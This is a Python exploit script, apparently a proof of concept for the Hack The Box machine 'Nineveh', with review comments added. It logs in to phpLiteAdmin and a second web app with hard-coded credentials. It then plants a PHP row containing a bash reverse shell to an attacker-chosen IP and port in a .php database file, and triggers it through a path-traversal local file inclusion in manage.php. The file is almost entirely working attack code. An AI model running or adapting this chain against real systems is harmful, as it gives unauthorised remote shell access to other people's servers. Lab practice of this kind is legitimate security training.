import argparse
import requests
from urllib.parse import quote
from time import sleep
# Silence urllib3's InsecureRequestWarning: the HTTPS requests below all pass
# verify=False, so the target's TLS certificate is never validated and each
# call would otherwise print a warning.
requests.packages.urllib3.disable_warnings()
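def Get_Arguments(argv=None):
    """Parse the command-line options for this script.

    Args:
        argv: Optional list of argument strings. ``None`` (the default) keeps
            the original behaviour of parsing ``sys.argv[1:]``; passing an
            explicit list lets the function be exercised without touching
            ``sys.argv``.

    Returns:
        A ``(ip, target, listen_port)`` tuple of strings, in the order the
        module-level caller unpacks them. All three options are required.

    Raises:
        SystemExit: raised by argparse when a required option is missing or
            an unknown option is given (argparse prints usage and exits).
    """
    parser = argparse.ArgumentParser(description="Nineveh machine LFI to RCE ")
    # "-ip" has no long form; argparse still derives the dest "ip" from it.
    parser.add_argument("-ip", help="local IP address", required=True)
    parser.add_argument("-t", "--target", help="target ip address", required=True)
    parser.add_argument(
        "-lp",
        "--listen_port",
        help="listening port for capturing the reverse shell",
        required=True,
    )
    # parse_args(None) reads sys.argv[1:], exactly as the original did.
    args = parser.parse_args(argv)
    return args.ip, args.target, args.listen_port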
# Script body: everything below runs at import time (no __main__ guard).
# The flow chains two weaknesses visible in the requests themselves: hard-coded
# credentials for both web applications, and a path-traversal string in the
# `notes` parameter of manage.php that includes a file written via phpLiteAdmin.
ip,target,lp = Get_Arguments()
print("[*] Starting POC for Nineveh machine hack the box.....")
print("[*] Make sure to open netcat listener on your specified port! (for example nc -lnvp 443)\n")
# One session object for the HTTPS (phpLiteAdmin) side so cookies it sets are
# carried across the following requests.
s1=requests.session()
# Step 1: log in to phpLiteAdmin with a hard-coded password.
# verify=False disables TLS certificate validation for this request.
r=s1.post("https://{0}/db/index.php".format(target), data={"password":"password123",
"remember":"yes","login":"Log+In","proc_login":"true"},verify=False)
# NOTE(review): a 200 only means the page rendered; a rejected login may also
# return 200, so this is not a reliable success check. There is no else branch,
# so on any other status the script ends silently with no message.
if r.status_code == 200:
    print("[*] Connected successfully to phpliteadmin v1.9 panel")
    sleep(3)
    print("[*] Creating new database 'hack.php'...")
    # NOTE(review): PHPSESSID here is a fixed literal rather than the cookie the
    # s1 session received at login; the two may disagree — confirm which one
    # the server honours. The pla3412 cookies mirror the password/salt form.
    https_cookies = {"pla3412": "password123", "pla3412_salt": "0", "PHPSESSID": "pcroh40mg5buvqniidunp4k761"}
    # Browser-like headers; Referer and Origin are built from the target host.
    https_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Referer": "https://"+target+"/db/index.php?switchdb=%2Fvar%2Ftmp%2Fhack.php", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://"+target, "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers", "Connection": "close"}
    # Step 2: create a database whose file name ends in .php, then switch the
    # panel to it. The switchdb value (%2Fvar%2Ftmp%2Fhack.php) is the on-disk
    # path later referenced by the LFI request at the bottom of the script.
    r=s1.post("https://{0}/db/index.php".format(target),headers=https_headers,cookies=https_cookies,data={"new_dbname":"hack.php"},verify=False)
    r=s1.get("https://{0}/db/index.php?switchdb=%2Fvar%2Ftmp%2Fhack.php".format(target),verify=False)
    sleep(3)
    print("[*] Creating table in the new database...")
    # Step 3: phpLiteAdmin's two-stage table form — first the field count, then
    # the confirmed field definitions (one TEXT column named "info").
    r=s1.post("https://{0}/db/index.php".format(target),params={"action":"table_create"},data={"tablename":"table","tablefields":"1","createtable":"Go"},verify=False)
    r=s1.post("https://{0}/db/index.php".format(target),params={"action":"table_create","confirm":"1"},data={"tablename":"table","rows":"1",
    "0_field":"info","0_type":"TEXT","0_defaultvalue":"a"},verify=False)
    sleep(3)
    print("[*] Inserting malicious php code to table row...")
    # Step 4: the row value is a PHP stub that spawns a bash reverse shell back
    # to ip:lp (the two values taken from the command line). Storing it in the
    # row places the string inside the .php database file on disk.
    payload="<?php `/bin/bash -c 'bash -i >& /dev/tcp/{0}/{1} 0>&1'` ?>".format(ip,lp)
    r=s1.post("https://{0}/db/index.php".format(target),params={"table":"table","action":"row_create","confirm":"1"},
    data={"numRows": "1", "function_0_info": '', "0:info": payload, "fields": "info"},verify=False)
    # NOTE(review): none of the responses above are inspected; the success
    # message is printed unconditionally.
    print("[*] The php code is now inserted in table row!")
    sleep(3)
    # Step 5: log in to the separate plain-HTTP application on port 80 with
    # hard-coded credentials. This uses module-level requests.post rather than
    # the s1 session, so cookies are passed explicitly (same fixed PHPSESSID).
    http_cookies = {"PHPSESSID": "pcroh40mg5buvqniidunp4k761"}
    http_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+target, "Connection": "close", "Referer": "http://"+target+"/department/login.php", "Upgrade-Insecure-Requests": "1"}
    r=requests.post("http://"+target+":80/department/login.php",headers=http_headers,cookies=http_cookies,data={"username": "admin", "password": "1q2w3e4r5t", "rememberme": "on"},allow_redirects=True)
    # NOTE(review): with allow_redirects=True, r.status_code is the status of
    # the final response after any redirect, so it is unlikely to equal 302 and
    # the branch below may never execute — confirm against the server's actual
    # behaviour (r.history holds the intermediate redirect responses).
    if r.status_code == 302:
        print("[*] Connected to the http server succesfully")
        sleep(3)
        print("[*] Using LFI vulnerability to access our php code...")
        second_request_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
        # Step 6: the `notes` parameter is a traversal string ("../../var/tmp/hack.php"
        # appended to the expected file) that makes manage.php include the .php
        # database file written in step 2, executing the PHP stored in step 4.
        # The response body is not checked; success is only observable on the
        # listener the user was told to start.
        r=requests.get("http://"+target+":80/department/manage.php?notes=/files/ninevehNotes.txt/../../var/tmp/hack.php",headers=second_request_headers,cookies=http_cookies)
        print("[*] LFI request was done, check your netcat listener for the reverse shell!")